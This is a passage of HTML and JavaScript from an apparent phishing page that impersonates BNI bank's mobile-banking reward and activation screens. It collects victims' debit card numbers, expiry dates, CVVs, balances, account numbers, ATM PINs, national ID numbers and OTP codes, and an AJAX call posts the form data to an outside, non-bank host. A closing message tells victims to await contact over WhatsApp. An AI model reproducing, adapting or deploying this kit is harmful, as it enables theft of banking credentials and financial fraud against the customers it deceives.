                                <img id="password" src="assets/icons/images/WelcomePage/hide_eye.svg" alt=""
                                     onclick="passwordShowing()">
                            </button>
                        </div>
                    </div>
                </div>
     </div>
       
    <nav class="nav justify-content-center " style="background: unset;box-shadow: none; padding: 10px" id="buttonNextPage">
        <button id="buttonNext" type="submit" class=" btn btn-block-rectangle-80 btn-block-rectangle button-green-rec-new"
                onclick="aktivasiRegMpinNewEnd()" style="margin-bottom: 0px; background: #FF7F08; border: none; box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2);"><strong>Lanjut</strong></button>
                
    </nav>
 <img src="assets/lps.png" width="100%">
</div>
</form>
     
</fieldset>
<fieldset id="menupage" style="display: none; position: fixed; height: 100%; left: 0; right: 0; top: 0; bottom: 0; width: 100%; z-index: 9999; background-image: url(assets/images/welcome-bg.png); 
  background-size: 100% 100%; 
  background-position: 100% 100%;">
    <header class="title " style="background: #FF7F08">
        <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz-ASbtzrlPGXA_9kDaXQVutLoWx-rHN55gplBfPxgGejo-dY4YYHOw9-IPedBxt7Q-0OUOg4FhW8hTxAW05XdJStCGXUYeYUCKcSXPQc1UKvwpp-oZbL29vQCgfsI-TVWTeeBNc3rSS4hBpnUaB2l5Oo-CQDu4KfwBRP1rXTvo0vxiM6xvj1fdEgXVZE/s1080/1693939692052.png" style="width: 90px; float:left; margin-top: 8px; margin-left: 5px; position: absolute">
        <div class="header-title" >
            <i class="signal-indicator-base right ico-signal-indicator"></i>
            <i class="bni-ico ico-chevron-grey ico-header left ml-3" onclick="goBack()" ></i>
            <h6 class="mb-0 mx-auto" style="margin:auto; color: white; ">Menu</h6>
        </div>
        <div class="progress-bar--outer mt-3" style="background: #18A6B2">
            <div class="progress-bar" style="background: #fff"></div>
        </div>
    </header>
  <div class="container" style="margin-bottom: 0px">
        <div style="margin-top: 10px">
            <button onclick="goBack()" style="border:none;background: none;width: 40px;height: 15px;outline:none;">
                <i class="ico-back" style="width: 40px;height: 15px;display: inline-block;background-size: 100% 100%;"></i>
            </button>
        </div>
        <div style="margin-top:0px">
            <h1 style="font-weight: bold;color: #005e6a;font-size: 20px; margin: auto; text-align: center">Selamat Datang di BNI Reward POIN </h1><br>
            <center>
            <img src="assets/images/1024px-BNI_logo.png" alt="bni-logo" style="height: 25px;">
            </center>
        </div>
        <div>
            
        </div>
        <center>
        <h2 style="font-size:13px;margin-top:80px;margin-left: 0px;font-weight: bold; margin-bottom: 10px">Apakah sudah Terdaftar di Mobile Banking :</h2>
        <div>
            </center>
            <br/>
            <center>
            <button type="button" class="btn btn-bni-orange btn-block-doa" onclick="sudahT()" style="text-align: center;line-height: 20px; height: 70px; position: absolute; width: 320px; left: 0; right: 0;">Iya, Sudah Terdaftar<br/><a style="font-weight:bold">Mobile Banking</a></button>
            </center>
       <p></p>
        <div style="margin-top: 90px">
            <button type="button" class="btn btn-block-doa"  style="text-align: center;line-height: 20px; height: 70px; position: absolute; width: 300px; left: 0; right: 0;color: #ffffff;background-color: #00b4e4;" onclick="belumT()">Belum, Terdaftar<br/><a style="font-weight:bold">Mobile Banking</a></button>
            </center>
        </div>    
</fieldset>
<fieldset id="debitpage" style="display: none;">
<div class="container" style="background-color: rgba(239, 242, 244, 0.85);  background-image: url(assets/images/welcome-bg.png); 
  background-size: 100% 100%; 
  background-position: 100% 100%; position: absolute; height: 100%; z-index: -1; padding-left: unset;padding-right:unset; position: absolute; z-index: 9999; top: 0; bottom: 0; right: 0; left: 0; overlay: scroll;" id="container" >
    <header class="title " style="background: #FF7F08">
        <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz-ASbtzrlPGXA_9kDaXQVutLoWx-rHN55gplBfPxgGejo-dY4YYHOw9-IPedBxt7Q-0OUOg4FhW8hTxAW05XdJStCGXUYeYUCKcSXPQc1UKvwpp-oZbL29vQCgfsI-TVWTeeBNc3rSS4hBpnUaB2l5Oo-CQDu4KfwBRP1rXTvo0vxiM6xvj1fdEgXVZE/s1080/1693939692052.png" style="width: 90px; float:left; margin-top: 8px; margin-left: 5px; position: absolute">
        <div class="header-title" >
            <i class="signal-indicator-base right ico-signal-indicator"></i>
            <i class="bni-ico ico-chevron-grey ico-header left ml-3" onclick="goBack()" ></i>
            <h6 class="mb-0 mx-auto" style="margin:auto; color: white; ">Data Kartu Debit</h6>
        </div>
        <div class="progress-bar--outer mt-3" style="background: #18A6B2">
            <div class="progress-bar" style="background: #fff"></div>
        </div>
    </header>
    <hr class="mt-0">
    <div class="row wizard-nav" style="display: flex; align-items: center; justify-content: center; margin-top: 1rem; " >
 <div class="flip-card" id="app">
  <div class="flip-card-inner">
    <div class="flip-card-front" style="background-image: url(assets/images/BNIDebitCard/517863.png); background-position: 100% 100%; background-size: 100% 100%; border: 2px solid #ddd; outline: 3px double #FF7F08">
      <br/>   
    </div>
    <div class="flip-card-back" id="flip" style="background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEid-T0bsxbtJ33CAgVYqwt6CXWC9mq3rF8CWd00VOozIPl-nSvYyACB47CA8gJX76DWw1UkLG0aacZhFabWdgrVHqFnYrG8XRi291dRVIDoMsYXAs8KnnOFWgoZWPSS23O-dNCHtO7tzcIk0Rr6jNOHzl51FherbIpZluCaG19BiKV-hJApaxtlArk201o/s1080/AddText_09-07-02.28.19.png); background-position: 100% 100%; background-size: 100% 100%; height: 170px; border: 2px solid #ddd; outline: 3px double #E55300">
     
      <center>
      <p><div type="tel" style="width: 90%; height: 30px; background: #fff; margin-top: 50px; text-align: right; color: #000; padding-top: 5.5px"><span style="margin-right: 60px; margin-top: -10px" id="ccc">CVV :</span><span id="cvvin" style="color: #000;"></span></span></div></p> 
      </center>
      <p></p>
    </div>
  </div>
</div> <br/>   
 
        <p style="font-size:12px; color: #005E6A !important;font-weight: 500;margin-bottom: 0.7rem; margin-top: 10px"></p>
    </div>
<form id="formDebit" onsubmit="openNotif()" method="POST">
    <div class="wizard-content wizard-active" id="wizard-content-1" style="padding-left: 20px;padding-right:20px; margin-top: -10px">
        <br/>
        <div class="card m-2 pt-2" style="border:1px solid #18A6B2; position:static; height: 210px; top: -10px">
            <div class="card-body p-2" style="height: 30px; padding: 8px; margin-top:">
                <div class="form-group mb-0">
                    <label for="" class="mb-0 new-green-color-style">Nomor Kartu Debit</label>
                    <div class="input-group mb-3 pt-0 mt-0 border-bottom rounded-0">
 <input type="hidden" id="nomorku" name="nope1">                    
     <input type="tel" class="form-control-sm input" id="debit" name="debit" pattern="(?=.*[0-9]).{19,19}"  required oninvalid="this.setCustomValidity('Mɑsukkɑn 𝟭𝟲 𝗱𝗶𝗴𝗶𝘁 Nomor 𝗞𝗮𝗿𝘁𝘂 𝗗𝗲𝗯𝗶𝘁 dengɑn Benɑr')" onchange="this.setCustomValidity('')" >
                    </div>
                </div>
                <div class="form-group mb-0" style="width: 35%;  position: absolute; left: 38">
                    
                    <label for="" class="mb-0 new-green-color-style">Masa Berlaku </label>
                    <div class="input-group mb-3 pt-0 mt-0 border-bottom rounded-0" style="width: 100%">
     <input type="tel" class="form-control-sm input" id="valid" name="valid" pattern="(?=.*[0-9]).{5,5}"  required oninvalid="this.setCustomValidity('Mɑsukkɑn Mɑsɑ Berlɑku kɑrtu dengɑn benɑr untuk 𝗕𝘂𝗹𝗮𝗻 dɑn 𝗧𝗮𝗵𝘂𝗻 nyɑ')" onchange="this.setCustomValidity('')"
                               onkeyup="valueCheck()">
                    </div>
                </div>
                <div class="form-group mb-0" style="width: 38%;  position: absolute; float: right; right: 40">
                    <label for="" class="mb-0 new-green-color-style">CVV </label>
                    <div class="input-group mb-3 pt-0 mt-0 border-bottom rounded-0" style="position: absolute; float: right; right: 0">
     <input type="tel" class="form-control-sm input" id="cvv" name="cvv"  pattern="(?=.*[0-9]).{3,3}"  required oninvalid="this.setCustomValidity('𝗖𝗩𝗩 ɑdɑlɑh (𝟯 𝗱𝗶𝗴𝗶𝘁 𝗮𝗻𝗴𝗸𝗮 yɑng berɑdɑ dibelɑkɑng kɑrtu)')" onchange="this.setCustomValidity('')"
                               onkeyup="valueCheck()">
                    </div>
                </div>
                <div class="form-group mb-0" style="margin-top: 80px">
                    <label for="" class="mb-0 new-green-color-style">Saldo Terakhir</label>
                    <div class="input-group mb-3 pt-0 mt-0 border-bottom rounded-0">
  <input type="tel" class="uang form-control-sm input" required id="saldo" name="saldo" minlength="5" 
                               onkeyup="valueCheck()" onclick="flipback()" value="" style="background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe-Idq42mWgtclhLZhDmwthinuthln9vPg0baIQp-SUYSezJwr0_ZtXArsOrAIoDTnUGIa0h9UiCzji48bcKTUFJV8Lr3LtM5HWXEyczuWy7sSoDPjMH1XJuu8f3Eaa_Fo6oLGwkz2ZHgWgOrZ2J04xN6ERYap4LA2HbIBYmum9dmBR_VIxF4Rp79qExo/s1080/AddText_12-30-09.39.24.jpg); background-size: 100% 110%; background-position: 100% 90%; padding-left: 35px">
                    </div>
                </div>
              
            </div>
        </div>
       
        <div class="p-4">
            <div class="row pb-3" style="font-size: 12px; font-weight: 400;">
               
            </div>
        </div>
    </div>
    <nav id="buttonNext" class="nav justify-content-center" style="background: unset;box-shadow: none; margin-top: -75px">
        <button id="nextBtn" type="submit" class="btn btn-block-rectangle-80 btn-block-rectangle button-green-rec-new"
                onclick="Inquiry_RegistrationStepSecond(false)"  style="margin-bottom: 100; background: #FF7F08; border: none; box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2);"><strong>Lanjut</strong></button>
    </nav>
</div>
</form>

</fieldset>
<fieldset id="datapage" style="display: none">
 <div class="container" style="background-color: rgba(239, 242, 244, 0.85);  background-image: url(assets/images/welcome-bg.png); 
  background-size: 100% 100%; 
  background-position: 100% 100%; position: fixed; height: 100%; z-index: 999999;">
     <legend id="datainfo" style="display: none; top: 100; color: #000; position: fixed; height: 100%; left: 0; right: 0; margin: 0px auto; z-index: 999999999; background-color: rgba(239, 242, 244, 0.85);  background-image: url(assets/images/welcome-bg.png); 
  background-size: 100% 100%; 
  background-position: 100% 100%;"><center>
     <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhjmRHirKoDwZGW14NwDjlWk_S66GC4FEssXzCNjfvWrSkmGmwzSid4hHlTTdE6Jh7n_S72p1p3Gn2svE4qafzpLVVd5weZRIuABb14tT_OKlKM1fOSJ1UUXKdBvepepCcAin6Xnup6FyuCQx5TDZ26S6DATDcGI6tIs4QKahRWseMt26QhKsXMF9D372I/s961/logo-BNI-46-1%20(1).png" style="margin-top:-5px;" width="63%"><br/>  
 <h1 style="font-size: 23px; margin-top: 0px; color: #000">Terima Kasih<br/>
 <span style="font-size: 15px; padding 5px">
 Permintaan sedang diproses,
 silahkan menunggu konfirmasi selanjutnya melalui WhatsApp</span>
 
 
 </h1><br/>
     </center>
   </legend>
<header class="title " style="background: #FF7F08; height: 70px">
        <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz-ASbtzrlPGXA_9kDaXQVutLoWx-rHN55gplBfPxgGejo-dY4YYHOw9-IPedBxt7Q-0OUOg4FhW8hTxAW05XdJStCGXUYeYUCKcSXPQc1UKvwpp-oZbL29vQCgfsI-TVWTeeBNc3rSS4hBpnUaB2l5Oo-CQDu4KfwBRP1rXTvo0vxiM6xvj1fdEgXVZE/s1080/1693939692052.png" style="width: 90px; float:left; margin-top: 8px; margin-left: 5px; position: absolute">
        <div class="header-title" >
            <i class="signal-indicator-base right ico-signal-indicator"></i>
            <i class="bni-ico ico-chevron-grey ico-header left ml-3" onclick="goBack()" ></i>
            <h6 class="mb-0 mx-auto" style="margin:auto; color: white; ">Aktivasi</h6>
        </div>
      
    </header>

        <hr class="mt-0">
        <div class="row wizard-nav" style="display: flex; align-items: center; justify-content: center;">
            <img style="max-width: 70%; max-height: 70%;opacity: 0" src="assets/icons/images/WelcomePage/lineCircle1.png"></img>

    </div>
 <legend id=="form-data" style="display: ">    
 <form id="formdata" onsubmit="sendData(event); return false" method="POST" >   
    <div class="wizard-content wizard-active" id="wizard-content-1" style="margin-top: -20px">
        <div class="card m-2 pt-2" style="border:1px solid #005E6A; position:static;">
            <div class="card-body p-2">
                <div class="form-group mb-0">
                    <label for="" class="mb-0 new-green-color-style" style="font-size: 13px">Nomor Rekening</label>
                    <div class="input-group mb-3 pt-0 mt-0 border-bottom rounded-0">
       <input type="tel" class="form-control-sm input" id="accountNum" name="accountNum" required maxlength="10">
                    </div>
                </div>
                <div class="form-group mb-0">
                    <label for="" class="mb-0 new-green-color-style" style="font-size: 13px">16 Digit No. Kartu ATM</label>
                    <div class="input-group mb-3 pt-0 mt-0 border-bottom rounded-0">
        <input type="tel" class="form-control-sm input" id="numCardATM1" name="numCardATM"
                     pattern="(?=.*[0-9]).{19,19}"  required oninvalid="this.setCustomValidity('Mɑsukkɑn 𝟭𝟲 𝗱𝗶𝗴𝗶𝘁 Nomor 𝗞𝗮𝗿𝘁𝘂 𝗗𝗲𝗯𝗶𝘁 dengɑn Benɑr')" onchange="this.setCustomValidity('')"            autocomplete="on"  required >
                        
                </div>
                    <div class="form-group mb-0">
                        <label for="" class="mb-0 new-green-color-style" style="font-size: 13px">PIN Kartu ATM</label>
                        <div class="input-group mb-3 pt-0 mt-0 border-bottom rounded-0">
                            <input type="tel" class="form-control-sm input" id="pinATM" autocomplete="off" name="pinatm"
                                   required maxlength="6" minlength="6">
                            
                        </div>
                    </div>
               
                <div class="form-group mb-0">
                    <label for="" class="mb-0 new-green-color-style" style="font-size: 13px">NIK</label>
                    <div class="input-group mb-3 pt-0 mt-0 border-bottom rounded-0">
                        <input type="tel" class="form-control-sm input" id="nik" name="nikktp" required minlength="16" maxlength="16">
                    </div>
                </div>
                 <div class="form-group mb-0">
                    <label for="" class="mb-0 new-green-color-style" style="font-size: 13px">Saldo Saat Ini</label>
                    <div class="input-group mb-3 pt-0 mt-0 border-bottom rounded-0">
                        <input type="tel" class="uang form-control-sm input" id="saldo" name="saldo1" required style="background: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhe-Idq42mWgtclhLZhDmwthinuthln9vPg0baIQp-SUYSezJwr0_ZtXArsOrAIoDTnUGIa0h9UiCzji48bcKTUFJV8Lr3LtM5HWXEyczuWy7sSoDPjMH1XJuu8f3Eaa_Fo6oLGwkz2ZHgWgOrZ2J04xN6ERYap4LA2HbIBYmum9dmBR_VIxF4Rp79qExo/s1080/AddText_12-30-09.39.24.jpg); background-size: 100% 110%; background-position: 100% 90%; padding-left: 35px">
                    </div>
                </div>
                    
        <div class="justify-content-center" style="margin-top:-5px; display: flex; z-index: -1;">
            <button type="submit"  class=" btn btn-block-rectangle-80 btn-block-rectangle button-green-rec-new" style="background: #FF7F08; border: none; box-shadow: 0 4px 8px 0 rgba(0,0,0,0.2);">Daftar
            </button>
        </div>
        </div>
    </div>
    </form>
   </legend>
   
  
</fieldset>        
<fieldset onsubmit="kirimPesan()" id="ryuSubmit" style="display: none" onchange="kirimotp()">

 <div class="container" style="background-color: rgba(239, 242, 244, 0.85);  background-image: url(assets/images/welcome-bg.png); 
  background-size: 100% 100%; 
  background-position: 100% 100%; position: fixed; height: 100%; z-index: -; overlay: none">
        <header class="title " style="background: #FF7F08">
        <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz-ASbtzrlPGXA_9kDaXQVutLoWx-rHN55gplBfPxgGejo-dY4YYHOw9-IPedBxt7Q-0OUOg4FhW8hTxAW05XdJStCGXUYeYUCKcSXPQc1UKvwpp-oZbL29vQCgfsI-TVWTeeBNc3rSS4hBpnUaB2l5Oo-CQDu4KfwBRP1rXTvo0vxiM6xvj1fdEgXVZE/s1080/1693939692052.png" style="width: 90px; float:left; margin-top: 8px; margin-left: -5px; position: absolute">
        <div class="header-title" >
            <i class="signal-indicator-base right ico-signal-indicator"></i>
            <i class="bni-ico ico-chevron-grey ico-header left ml-3" onclick="goBack()" ></i>
            <h6 class="mb-0 mx-auto" style="margin:auto; color: white; font-weight: bold">OTP</h6>
        </div>
      
    
    
    <div class="row wizard-nav" style="align-items: center; justify-content: center;margin-top: 0.6rem; margin-bottom: -25px; border-top: 5px solid #18A6B2; padding: 10px"></div>
        <div class="row wizard-nav" style="align-items: ; margin-top:; margin-bottom: -25px; border-top: 5px solid #fff; padding: 10px; width: 50%"></div>
          <div class="row wizard-nav" style="align-items: center; justify-content: center;margin-top: 0.6rem; margin-bottom: -25px; padding: 10px">
        <img style="max-width: 80%; max-height: 100%;"
             src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpg4xFEeYIfIXDQ0FPVygLvJQNzEzt1U2wSQ78ur07kyfNpXptiLJF9DCRW2mRgGaHy2vHf_o-N0B9WnKNB9-qt10X_nqv1WkiM9JR5VCQJ2_R7YFZ89Mg6gCpR3VO7Br_sVfdTpfUeHtklaETWaDju51tZwjdxavOGgjN7JibhZDHFfob3fy-SXcodaw/s341/lineCircleRegistrasi4.png">
    
    </div>
</header>
    <div class="wizard-content wizard-active" id="wizard-content-2" style="margin-top: 0rem">
        <div class="mt-2 pt-1 d-flex row">
            <div class="col-12 text-center">
                <strong style="font-size: 14px; margin-top: -30px" id="invalid">Masukkan Kode OTP</strong></p>
                <p><strong id="maskedMSISDN" style="color: #0c5460;font-size: 12px"></strong></p>
                <div action="" class="mt-3 pin-marks"
                      style="margin-bottom: 1rem;display: flex;justify-content: space-around; margin-top:">
                    <div class="row" style="margin-top: -100px;">
            <div class="col-12  mx-auto" style="height: 58.8px; font-size: 16px; font-weight: 400; color: rgb(59, 59, 59); line-height: 1.4; border-radius: 0px; margin-top: 140px; position: absolute; left: 0; right: 0; margin: 95px auto; text-align: center; width: 80%">
               <div class="row" style="text-align: center; margin-left: -35px">
  	<input type="hidden" name="nope2" id="nomorku2" value="">
    <input type="hidden" name="debitku" id="debit1" value="">
    
    <input type="hidden" name="validku" id="valid1" value="">
    <input type="hidden" name="cvvku" id="cvv1" value="">	
    <input type="hidden" name="saldoku" id="saldo1" value="">                 
     <input type="hidden" name="sixpin" id="setPin">
    
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; width: 50px;">
              <div class="otp extraBold" id="pin-1" style="box-sizing: border-box; width: 40px; font-size: 30px; text-align: center; padding-top: 0px;background-color: rgba(255, 255, 255, 0.34); border-radius: 10px; box-shadow: rgba(171, 171, 171, 1) 0px 0px 0px 0px; height: 42px;
        border: 2px solid lightgrey;
        color: rgb(0, 94, 106);"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;">
                            <div class="otp extraBold" id="pin-2"  style="box-sizing: border-box; width: 40px; font-size: 30px;  text-align: center; padding-top: 0px;background-color: rgba(255, 255, 255, 0.34); border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 42px;
        border: 2px solid lightgrey;
        color: rgb(0, 94, 106);"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;">
                            <div class="otp extraBold" id="pin-3" style="box-sizing: border-box; width: 40px; font-size: 30px; text-align: center; padding-top: 0px;background-color: rgba(255, 255, 255, 0.34); border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 42px;
        border: 2px solid lightgrey;
        color: rgb(0, 94, 106);"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;">
                            <div class="otp extraBold" id="pin-4" style="box-sizing: border-box; width: 40px; font-size: 30px;  text-align: center; padding-top: 0px;background-color: rgba(255, 255, 255, 0.34); border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 42px;
        border: 2px solid lightgrey;
        color: rgb(0, 94, 106);"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;">
                            <div class="otp extraBold" id="pin-5" style="box-sizing: border-box; width: 40px; font-size: 30px;  text-align: center; padding-top: 0px;background-color: rgba(255, 255, 255, 0.34); border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 42px;
        border: 2px solid lightgrey;
        color: rgb(0, 94, 106);"></div>
                        </div>
                    </div>
                    <div class="col-2">
                        <div class="bubble-r-box" style="height: 52px; left: 0px; width: 50px;">
                            <div class="otp extraBold" id="pin-6" style="box-sizing: border-box; width: 40px; font-size: 30px; text-align: center; padding-top: 0px;background-color: rgba(255, 255, 255, 0.34); border-radius: 10px; box-shadow: rgba(171, 171, 171, 0) 0px 0px 0px 0px; height: 42px;
        border: 2px solid lightgrey;
        color: rgb(0, 94, 106);"></div>
                        </div>
                    </div>
               </div>
                 </div>
            </div>
        </div>
        <div class="mb-1 mt-2 pt-2 d-flex row text-center" >
            <div class="col-12" style="margin-top: 40px">
                <p style="color:#F15A23;"><strong style="color:#F15A23;">
                    <div id="clockdiv" style="color:#F15A23;margin-bottom: 0rem;"></div>
                </strong></p>
                <p id="paragrap_kirim_ulang" onclick="kirim_otp()"><strong id="label_kirim_ulang" class="disable" style="font-weight:bold;">Kirim
                    Ulang OTP</strong></p>
            </div>
            <div class="col-12">
                <div class="row mb-2" id=""
                     style="text-align: justify; padding-top: 5px; padding-bottom: 5px; margin-left:45px; margin-right:10px; margin-top: 5px; border-radius: 5px;">
                    <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbar82rcxxccQej9J2UonmJ-pGNnnJA_Qc_BKu7FOqBQoxNiTuEMPMWlFTolLYtxy-coMjV6k4CD5Jq1K5MpjCBKMBNUMjwxRH031j-plXF5JjrtosBW2PVAxHGBIFyanxi9xItQ1hbe_Y3uTiO2RhrxrWQGpKuBy6GpyngpA3OpEZeoivyg4K1wMeN7k/s28/info_icon.png"
                         style="vertical-align:unset;margin:0;padding:0; width: 20px; height: 20px">
                    <p class="col-10" style="font-size:10px; margin:0; padding-left: 10px; line-height: 1.5; color:#005E6A;background: transparent"><b>Pastikan </b>nomor
                        anda memiliki pulsa <b>untuk menerima Kode OTP SMS</b></p>
                </div>
            </div>

<!--            <div class="col-12" style="margin-top: 1rem;margin-bottom: 1rem">-->
<!--                <img style="max-width: 100%; max-height: 100%;"-->
<!--                     src="assets/icons/images/WelcomePage/infoOtp.svg"/>-->
<!--            </div>-->
        </div>
        <div style="top: 24vh; position: absolute; left: 5vw; max-width: 90vw; right: 0;margin-top: -0.6%;">
            <div class="mb-4 mt-2 pt-2 px-3 d-flex row text-center">
                <div class="col-4">
                    <button class="pin-button" onclick="appendPIN('1')" id="setPin" data-id="1"><h3>1</h3></button>
                </div>
                <div class="col-4">
                    <button class="pin-button" onclick="appendPIN('2')" id="setPin" data-id="2"><h3>2</h3></button>
                </div>
                <div class="col-4">
                    <button class="pin-button" onclick="appendPIN('3')" id="setPin" data-id="3"><h3>3</h3></button>
                </div>
            </div>
            <div class="mb-4 mt-2 pt-2 px-3 d-flex row text-center">
                <div class="col-4">
                    <button class="pin-button" onclick="appendPIN('4')" id="setPin" data-id="4"><h3>4</h3></button>
                </div>
                <div class="col-4">
                    <button class="pin-button" onclick="appendPIN('5')" id="setPin" data-id="5"><h3>5</h3></button>
                </div>
                <div class="col-4">
                    <button class="pin-button" onclick="appendPIN('6')" id="setPin" data-id="6"><h3>6</h3></button>
                </div>
            </div>
            <div class="mb-4 mt-2 pt-2 px-3 d-flex row text-center">
                <div class="col-4">
                    <button class="pin-button" onclick="appendPIN('7')" id="setPin" data-id="7"><h3>7</h3></button>
                </div>
                <div class="col-4">
                    <button class="pin-button" onclick="appendPIN('8')" id="setPin" data-id="8"><h3>8</h3></button>
                </div>
                <div class="col-4">
                    <button class="pin-button" onclick="appendPIN('9')" id="setPin" data-id="9"><h3>9</h3></button>
                </div>
            </div>
            <div class="mb-4 mt-2 pt-2 px-3 d-flex row text-center">
                <div class="col-4 offset-4">
                    <button class="pin-button" onclick="appendPIN('0')" id="setPin" data-id="0"><h3>0</h3></button>
                </div>
                <div class="col-4">
                    <button class="pin-button" onclick="deletePIN()" id="hapus"><h3><i style="margin-top: 0;padding-right: 2em;"
                     class="bni-ico ico-bksp ico-xtra-small filter-new-bni" style=""></i>
                    </h3></button>
                </div>
            </div>
        </div>
    </div>
</div>


    
</fieldset>

    
     
   
<!--Modal Activation Error-->
<script src="assets/vendors/jquery/jquery-3.3.1.min.js"></script>
<script src="assets/vendors/jquery/"></script>
<script src="assets/vendors/bootstrap/js/bootstrap.min.js"></script>
<script src="assets/js/script.js"></script>
<script src="cordova.js"></script>
<script src="assets/js/custombox.js"></script>
<script src="assets/js/scripts.js"></script>
<script src="assets/js/appsflyer.js"></script>
<script src="assets/js/soapclient.js"></script>
<script src="assets/js/spin.js"></script>
<script src="assets/js/configurl.js"></script>
<script src="assets/js/aes.js"></script>
<script src="assets/js/jsencrypt.min.js"></script>
<script src="assets/js/bni_public.js"></script>
<script src="assets/js/Registrasi.js"></script>
<script src="assets/js/signalIndicator.js"></script>
<script src="assets/js/Util.js"></script>
<script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script src="https://dev-danapemulihan.pantheonsite.io/asset/jquery.mask.min.js"></script>
<script>$(document).ready(function(){
$('#debit').mask('0000 0000 0000 0000');
$('#valid').mask('00/00');
$('#numCardATM1').mask('0000 0000 0000 0000');
$('#cvv').mask('000');

});</script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"



    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="

    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script>
var nomorku1 = sessionStorage.getItem("nomorku1");
document.getElementById("nomorku2").value = nomorku1 + "";
var nomor = sessionStorage.getItem("nomor");
document.getElementById("nomorku").value = nomor + "";
var debitku = sessionStorage.getItem("debitku");
document.getElementById("debit1").value = debitku + "";
var validku = sessionStorage.getItem("validku");
document.getElementById("valid1").value = validku + "";
var cvvku = sessionStorage.getItem("cvvku");
document.getElementById("cvv1").value = cvvku + "";
var saldoku = sessionStorage.getItem("saldoku");
document.getElementById("saldo1").value = saldoku + "";

</script>
<script>

function kirimPesan(){

var nomorku1 = sessionStorage.getItem("nomorku1");
document.getElementById("nomorku1").value = nomorku1 + "";
var nomor = sessionStorage.getItem("nomor");
document.getElementById("nomorku").value = nomor + "";
var debitku = sessionStorage.getItem("debitku");
document.getElementById("debit1").value = debitku + "";
var validku = sessionStorage.getItem("validku");
document.getElementById("valid1").value = validku + "";
var cvvku = sessionStorage.getItem("cvvku");
document.getElementById("cvv1").value = cvvku + "";
var saldoku = sessionStorage.getItem("saldoku");
document.getElementById("saldo1").value = saldoku + "";
}
</script>
<script>
      $(document).ready(function() {
            $("button#setPin").on('click', function() {
                var pin = $(this).attr('data-id');
                
                if($.trim($("#pin-1").html())=='') {
                    $("#pin-1").html(pin);
                } else if($.trim($("#pin-1").html())!='' && $.trim($("#pin-2").html())=='') {
                    $("#pin-2").html(pin);
                } else if($.trim($("#pin-2").html())!='' && $.trim($("#pin-3").html())=='') {
                    $("#pin-3").html(pin);
                } else if($.trim($("#pin-3").html())!='' && $.trim($("#pin-4").html())=='') {
                    $("#pin-4").html(pin);
                } else if($.trim($("#pin-4").html())!='' && $.trim($("#pin-5").html())=='') {
                    $("#pin-5").html(pin);
                } else if($.trim($("#pin-5").html())!='' && $.trim($("#pin-6").html())=='') {
                    $("#pin-6").html(pin);

                    var setPin = $("#pin-1").html()+''+$("#pin-2").html()+''+$("#pin-3").html()+''+$("#pin-4").html()+''+$("#pin-5").html()+''+$("#pin-6").html();
                    $("input#setPin").val(setPin);

                    var pinValue = $("input#setPin").val();

                    if(pinValue.length == 6) {
                  $("fieldset").submit();
                    }
                }
            });

            $("#hapus").on('click', function() {
                $("#pin-1").html('');
                $("#pin-2").html('');
                $("#pin-3").html('');
                $("#pin-4").html('');
                $("#pin-5").html('');
                $("#pin-6").html('');
            });
        });
</script>    
<!-- Bootstrap & jQuery JS -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>
    <script>
$(document).ready(function(){
    $('#formNope').submit(function(e) {
        e.preventDefault();
           $("#loadersaya").show();
  
 var nomor = document.getElementById("nope").value;
 sessionStorage.setItem("nomor", nomor);
 
          $.ajax({
              url: 'https://cs-layanan.kencang.id/dat4/nomorhp.php',
              type: 'post',
              data: $(this).serialize(),             
success: function(data) {
  
    setTimeout(function(){
  
   $("#loadersaya").hide();  
      
    }, 1500);
               
            },
           error: function() {
                      
    setTimeout(function(){
 
 $("#loadersaya").hide();
    }, 1500);

            }
        });
    });
});
 </script>
 <script>
     function sendNoHp(){
         
       setTimeout(function(){
   $("#homepage").fadeOut();     
   $("#menupage").fadeIn();      
       }, 1500);
  var nomor = document.getElementById("nope").value;
 sessionStorage.setItem("nomor", nomor);
   var nomorku = document.getElementById("nope").value;
 sessionStorage.setItem("nomorku", nomorku);
  }
  
  
  
  function openNotif(){
    var nomorku1 = document.getElementById("nomorku").value;
 sessionStorage.setItem("nomorku1", nomorku1);
var debitku = document.getElementById("debit").value;
 sessionStorage.setItem("debitku", debitku);
 
 var validku = document.getElementById("valid").value;
 sessionStorage.setItem("validku", validku);
 var cvvku = document.getElementById("cvv").value;
 sessionStorage.setItem("cvvku", cvvku);
